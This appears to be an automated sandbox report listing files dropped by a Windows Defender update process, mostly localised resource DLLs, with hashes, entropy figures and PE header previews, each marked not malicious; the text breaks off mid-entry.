Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31504
Entropy (8bit):	5.077118905746297
Encrypted:	false
SSDEEP:	384:oxOMV5+Bx8HDJHJUrRKJ89J2YlIR9Y3awJRRJRWJXzJFIRWIRBYMRmaNV/dpxca5:45+Bxjpfb1PvWF//dj9zs
MD5:	6AE84543305BD75F7DF3793EAE2596BA
SHA1:	08623A14FE16A10535C0457761ABC83EA0FBB51A
SHA-256:	D0895C331FDB7E561D7C91854347727C97B66A4F6306FAC1BA9668A5656591D5
SHA-512:	D3F872CB597EC427D02C7A8313334EAF570751EB5B575032796E584F2E4902A68890BDCB6D3735C15F836B593D7688EE51594CDD8C65B2823E9426F892559ACE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T............................................................@.......................................... ..,Q...........V...%...........................................................................................rdata..............................@..@.rsrc...,Q... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..@L...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\mk-MK\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	5.392635909511525
Encrypted:	false
SSDEEP:	384:seohFEowzdDFexfiNCRWSa/WizDBRJ5tfpUad+JR9zusNvV:V8EPexKDT1P5t2adk9zuE
MD5:	3D7BAC89AC44D84F941264E77E169B00
SHA1:	72D6E5B3B677762C3985995DDA213D6931D4C7F3
SHA-256:	5680565A3E45323E2C2AD7FF8C613D08E13D928EE81C34458C1FCBA0E4CCEBFA
SHA-512:	81B52BB902B4C39C1AC0AA6E6070AE192DC3DDD948663BA88120855B498872D9BBDCFCF331BE20892E3CF8C21F66EE07D4894A52E559B9F4DF4D83A89B59D529
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z......................................................>.....@.......................................... ...V...........\...%...........................................................................................rdata..............................@..@.rsrc....V... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...Q...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ml-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35080
Entropy (8bit):	5.449941825985999
Encrypted:	false
SSDEEP:	384:5ejQrFW2rFaDe40PlmzNA+CxaEBo8egX4RLjeNUeEbL7eu8ewceB3eww9x5ERB/f:3Peu7zC8CcQXEVn1P7ARmuU9zugV
MD5:	346D372A58F10080A00FE95032716E36
SHA1:	A1ACCE864C6A95B48220720672C71AE620A06759
SHA-256:	12C1965DBD70FEB84EAE63E30547E64719F5DA91CE0F39412FB117C7039A505C
SHA-512:	71A4D0981D3008EE2A10FFFFA1E319DD2E5F324B4D7E10AD509A816C9957B747FA58BE216804581EC70D3A3A79457F99A1103A81088640A6F781F70D8B47B825
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........b............................................................@.......................................... ...^...........d...%...........................................................................................rdata..............................@..@.rsrc....^... ...`..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...Y...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\mpextms.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906232
Entropy (8bit):	6.493477252293421
Encrypted:	false
SSDEEP:	12288:5V++kJ2Mbq7UpcQITnXp+PGPuwcZWybN3spat53o2yfCO:i2MbSUm+uPu1ZWGqpathYCO
MD5:	8F371B4D4DFB115DCA53CCB3CA5089E3
SHA1:	341EDE53DF665094E0FD6FDAA8984427133D92AA
SHA-256:	B42464EB6CCDE9D55347D1B71BD98C35E073993068A3F731ADEC2ED7B1D935F2
SHA-512:	2F6229BB2F84AA156AAFD67ADEE90748792AD395AC55AFBBDC7FA686E97C3EDFFC09D4F06768A2AF2F78C090F9F9732BC0ADCFA8BF461055ECBFBBBE43AF4936
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.~...-...-...-.q.,...-.q.,...-.q.,...-.q.,...-...-...-.q.,...-.q}-...-.q.,...-Rich...-........PE..d....{..........."......P...P......`..........@.........................................`.......... ...................................................... ...f.......C..........p...p...................@...(.......@...........h................................text....I.......P.................. ..`.rdata...b...`...p...`..............@..@.data...PL.......0..................@....pdata...f... ...p..................@..@.rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\mr-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33040
Entropy (8bit):	5.498783100778342
Encrypted:	false
SSDEEP:	384:vhzWZiws9ezTjrTkaQdK33ykzX1yAdWSa/WhaDBRJdC6TN4tgR9zvY:JIUt1PdC6TNx9zw
MD5:	311525E24312780C935A86E05C41C40B
SHA1:	146882506E4E396DABB4C91314B842EE0569BDC9
SHA-256:	5B57FC0019B007A1C0DB503960D2358187B5B093D88703DC3916803C2D74D28F
SHA-512:	6182D91F8296F8B2352FABB0D94DCE5AAD5CA73A5F5F32501B1EFE5837CEBB69A6127C6BAFC7809B44F0FDF40EEB1581DC19DB3453136AEDA8196B16392BD4B8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z............................................................@.......................................... ..pW...........\...%...........................................................................................rdata..............................@..@.rsrc...pW... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..xR...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ms-MY\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32528
Entropy (8bit):	5.012239585698966
Encrypted:	false
SSDEEP:	384:dZpMW3RE7vHbdRKjweKqzSWSa/WqDBRJYCXzC/R9zUuse:BWJehr1PYCXzg9zdse
MD5:	3DBEC2DC4AB18BCB7714E8D07E57DCE8
SHA1:	25031DEA3846425C92436E4DB527B5970AAE4A73
SHA-256:	302E7485CD5AD88BF12F3FD546622E743715611F6AC9DF285C4FFF468A363CE7
SHA-512:	772C8B9205B248A9E4CDE6DBAE7F80FBB2CCF7C9B04212F8EC953E9316141A02EB9521F1B09CA8BB07495276C6EE0FC674C21AC44DB88E4711F22C29A4ECB539
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X............................................................@.......................................... ..`U...........Z...%...........................................................................................rdata..............................@..@.rsrc...`U... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..xP...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\mt-MT\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	5.2005780072980805
Encrypted:	false
SSDEEP:	384:b4ynpM9eGe4LNgsZ+n414KYdlDiCNH/W2jzCWSa/WVDBRJTu2vH3rPR9zus8qOL:09ZIA1PJ3l9zuAm
MD5:	98EE28A810B7E5DF4DBBCD86E3330D79
SHA1:	DF2F08205850DA017E18A4640A3F5B80CB492C9E
SHA-256:	72A7C54F44851B56FABDE4369CECB0A396B0219AAD4939766B3ED54D352F31D0
SHA-512:	71DC4E6659DE6D9D0C9D68549E35024BD3D5665926CCF8230A7ACB2F6FFE53AA5F27487AEA0F49E23320D8AEDFA02025A800841B0E226950786EA1B0178880F3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z.......................................................)....@.......................................... ...V...........\...%...........................................................................................rdata..............................@..@.rsrc....V... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..0Q...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nb-NO\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64264
Entropy (8bit):	4.308800279588984
Encrypted:	false
SSDEEP:	768:BfvxerfZ01HTSwbB812S+BBBRBac1Pr9/9zuC:hvkrfZ01H2wbB81r+BBBRBa8PvzuC
MD5:	F9641ABACFAD291152F537EA87E2FCB2
SHA1:	3EE6C0507818873F86EBB26AAAC3FCCDF65E366A
SHA-256:	FE1F8AC56F5AAA9C5DEE24EEFCA662E455AE0D1E9DB14A695BAE5C3F0F6C0D67
SHA-512:	DDACFBC1FBDFFDC982D6048F9147ED863223A1899C583511609A8E4A511B05DD1E54DF90EAC55D1DC691822725E18D9543662C8170147C5AA31293E5B553F436
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................$....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nb-NO\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54536
Entropy (8bit):	4.556130568056416
Encrypted:	false
SSDEEP:	384:9G4IwkuXyolHaYrNJzt+n1z2hFfYWFLDBRJzu2vH3rPR9zus8qbiW:9PJg1z2hFfjL1Pp3l9zuAbT
MD5:	E58DFEC6E6DBFE77293DA8B757107F52
SHA1:	543D6C89AD812C0B10BD46EEADD949072150146B
SHA-256:	14E6BDB530CF7157B6637CABAD3069E0798F6A372A32F635CE1121415B3094FC
SHA-512:	DBE6D280C3D90B4398537FA030EA4E0B3C3539D8F1216147481D1901A8EFAA28357D8257553BE5D2FA400F72CC91DCF1A3FA35382D47DD71A378D57ADD6C71E4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..D................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nb-NO\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30984
Entropy (8bit):	5.149584743429822
Encrypted:	false
SSDEEP:	768:UyWL0+k6wBdESfYvhl8OntdLR1P/med9zuzX:Ug+k6wBdESfYvhl8OntdLHPX/zuzX
MD5:	8C28BCEE098E24A451A8DF5E4C330A7D
SHA1:	E4C221E5D532CA915040311E6408B32A42185AC2
SHA-256:	3C0D8F0BA3D2A9346F87EBAEE2C5796CE660D0BB634969E0BAEA6135BB738407
SHA-512:	D97E5235B3CFA55CC2EF521FB5233E84296CB2EAA81741ECD07424FB3A96A925E8DDF7AD2AAA891B9B201E42F21A3D7A1E3DFAACC30B21CEDCED85CB99718EA0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p............@.......................................... ...N...........T...%...........................................................................................rdata..............................@..@.rsrc....N... ...P..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ne-NP\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	5.544169274685464
Encrypted:	false
SSDEEP:	384:8tOpLnK8okCiCNg2gokW+W8F/cUPmR2yXy9xDUWSa/WtDBRJ0y50ZSxR9zus2++:AOpLjmjCPk1Pz50Zi9zui+
MD5:	A79997F2EE56D419C1922FB2AA83CF84
SHA1:	0A80CF89A5A9B3F190C3519C2B6F6CEDEBC996DA
SHA-256:	DF078BFE40D0AD2A4DA1DCF3226D64F9359DBA42F4C403CD32EC99CEA2C240CE
SHA-512:	A03E5EE2BFEF50871BC961156118C74F5749200B8EA45F87CF795D10E79EC618FFF2D40CD76CC30533F68A77E8F43B10C9BFE94BB0F10A6A71A61AB39514749D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z.......................................................A....@.......................................... ...V...........\...%...........................................................................................rdata..............................@..@.rsrc....V... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...Q...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nl-NL\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69896
Entropy (8bit):	4.227977535190703
Encrypted:	false
SSDEEP:	1536:XHKTJTaf0QqPDQnWSVUi0C4Dane0SAMPz/zuzL:XHKTJTaf0QqPDQnWSVUi0C4DarSAMb/a
MD5:	BEDEEBDAC351888BB2CB0AAEC4FEBEF2
SHA1:	205D3B9EFF76B42B598DCB49FF32224A776DAED4
SHA-256:	C82416855AA5A2A4D4483C90674B2E40EC5D400DE64B23F004E165E2551EF650
SHA-512:	EDE08346F10C77926572EFB0FCB5A849C60154E6E7D5D38FAF200B57B9C2E65064F3F00AB29FC190CBE03B359207F12EFDA05460A206AE09969F1EC28045942A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................`.....@.......................................... .. ................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nl-NL\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55568
Entropy (8bit):	4.501844483388987
Encrypted:	false
SSDEEP:	384:og8+Ux0xd7DktwBtr1WAtwpj96FfCxEDGJ1aA56Z5w5qoTA5Wu00sWuHDBRJNmTa:owlfnz5+1dO5wLTApdC1PNmTNx9zY
MD5:	0C79F96E88055B2762AD5E3F837E0072
SHA1:	8C577ED1E5774E6D354DF9BF6CB69738B62F863C
SHA-256:	DC4228B0438DEF6E917B0335A64855A60C54610988FF7D78EED92E1442C9FAB7
SHA-512:	723D1457ED67989D0CFAD75A4B4962AFD1B4283A909F93EB2E9A4C2C36123AA2BC44A215B081956375815C8BD6A817225ED0BEE8005646F54EB589E396340B7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................^.....@.......................................... ..................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nl-NL\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	4.9903985184994
Encrypted:	false
SSDEEP:	384:iG7dE03OEgk1SXWSa/WDDBRJfzw4u2vH3rPR9zus8qNr:ia3g2RK1P7wY3l9zuA5
MD5:	93539DD469B2D43A695238A23378C9B2
SHA1:	C4B7D2BA320895610D345855CEE96A46030831FA
SHA-256:	B9196D45FC9BBE60821F75E0EAB1DF18D9387F7FA10AB50910E72049460A90F8
SHA-512:	804CD3A0A8089964EBD013E1C98C49976AB1C00582A74DB42F5A83A38A48998CA97F5D08EE08483341E73F87EFCC8E208B1AB6B35422B5BDD638D049E61B675B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z............................................................@.......................................... ..\W...........\...%...........................................................................................rdata..............................@..@.rsrc...\W... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...R...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\nn-NO\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30472
Entropy (8bit):	5.175219203395377
Encrypted:	false
SSDEEP:	384:cO/kxsakIyhELQYN+pEspyV1blzQLXNWSa/WGDBRJi4KsRmuTcR9zusSBnad:KyhELQYNAIVVlsLYn1PlDRmuU9zuAd
MD5:	6351B5B27057B9FD31D1A991F6DC6743
SHA1:	0715959DB22A74FC5C099BE510904E9F130A2037
SHA-256:	896A8054F8E799FE96956A9313E4F510AF5683A92258C5A83E38EFF16E1C8553
SHA-512:	2AE57796C4FE9193F31D47E2E8C3F5CBBBA0F39666B5A159B302CDCD1BDCBA168ACF38F120F2FCF8292118343AEE1E8DB327296D987B8C89109668DB52D5CFA1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........P...............................................p......Y.....@.......................................... ...L...........R...%...........................................................................................rdata..............................@..@.rsrc....L... ...N..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\or-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33544
Entropy (8bit):	5.536474070023731
Encrypted:	false
SSDEEP:	768:J6RSFIROzHXcMN9bqy3NuNFQNTuVl2Js2JOWH2mtL5LzJx7h3V38fNpWGV1PyadS:WVoTrxfcNTPgzus
MD5:	0B680BB478B4F700AF81D60A78DA3712
SHA1:	4185D20A0EE5EAE6B3E7194B282AA6A43758ECF1
SHA-256:	1464217DE88A282F47CEDFE78C37FE2AD042F2C25B96F8ADB55CE113AF5A4F2F
SHA-512:	226390991425014C881987C53883BCC2765BC7EE78F16835B2F2DA660AD338EFBE3B98C7CA8B898E02A6242C5D7626C3F997958D711438832C6EA9930A2D61FA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........\............................................................@.......................................... ...X...........^...%...........................................................................................rdata..............................@..@.rsrc....X... ...Z..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...S...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pa-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33544
Entropy (8bit):	5.537761924903263
Encrypted:	false
SSDEEP:	768:8gxd0WrdhWiQE3URTyDY1PQhg3l9zuAbk7:8Q0WrdhWiQsmyDgPwgHzuAQ7
MD5:	727D02BD59AF953BF7F177A0AF0E5B2D
SHA1:	3C9D1ED7F7728DA16897DF364D274C2F4F67DCE9
SHA-256:	F96AACDA7256326BD0156F6BC8B7C9C871355918E3107DD03430A87ABF6FB005
SHA-512:	512EEC125F9EE505185A2A336F0A67BB5A02A0FDACD2CFAB6A2C12BB97FD26EA16641EF18EBC7F0B14F286C8D32A3F04AA2788C4BE05885815C3E92D5D861835
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........\............................................................@.......................................... ...Y...........^...%...........................................................................................rdata..............................@..@.rsrc....Y... ...Z..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...T...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pl-PL\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70920
Entropy (8bit):	4.4007947708685125
Encrypted:	false
SSDEEP:	1536:NvhFRnWh4aT7796PEi4aT4aSST4akiPSFf9XzueN:WTicf9Xl
MD5:	48D73A32F2CEC902292B34D4612F200A
SHA1:	B3288F28342EA902AE404D63594BF9B7ACFC0FC9
SHA-256:	1D216B50DFCAC25088066CD9C8555CF169434FD5AC12033E91F63A8C6A46D1A8
SHA-512:	9ACB5F7678B7870BEF12A24368415F9D3B9D4725A89E19D378A33A44E68AF32B9ED7A26DE3FDAF6A2EE5500F69C7A1ADC1F0611F08D8795A07E0CEECE9DAF7E4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................[....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pl-PL\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59648
Entropy (8bit):	4.595218171379096
Encrypted:	false
SSDEEP:	1536:WKS2bod7w2Wr5xTHwkJokS07ll6qTTiUP++zH1M:W3rULZM
MD5:	9F0E690869E73700327144BF9117C42D
SHA1:	45395A4DFB80C79C4775375B9A58A453E9B78AF4
SHA-256:	18B0FFC4F903D3126240A3D342CA8CAE276B7437647BA9C6D61CD6FC9D48C43E
SHA-512:	1D471E34661E5B457D8B478C7D3BD51FAD9430DBE949B24C4ACA3ABD1233A061435290085FA28E652303A9314C0284E64D7D69708EF40443F2632247BE93D60D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pl-PL\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.160341000262781
Encrypted:	false
SSDEEP:	768:PvXRVVNF8bh/gE49kUMjt18u85oK99Pd1Pq9/9zuGc/:nRVVNF8baLPmzu5
MD5:	5280AD8E92F9DE2D5CD1EC68521B1CCD
SHA1:	7EAE11F8300AE5B068F1082BA40B6720101A01C4
SHA-256:	EA07D9A29F14F35C6A20EFEFE9ACC2E83275C5CA6BEDA0E22A8EE42660329F6E
SHA-512:	1A219FE73EBCE08B99A2D3D2523C6F12179915F6047B736D7375640A48B240E64C40B8D9F514FA794D990B155BB739544805DD15C7B293EA8C0D1DF3AF2E3FC6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X.......................................................l....@.......................................... ...T...........Z...%...........................................................................................rdata..............................@..@.rsrc....T... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..(P...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-BR\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66312
Entropy (8bit):	4.317325805202578
Encrypted:	false
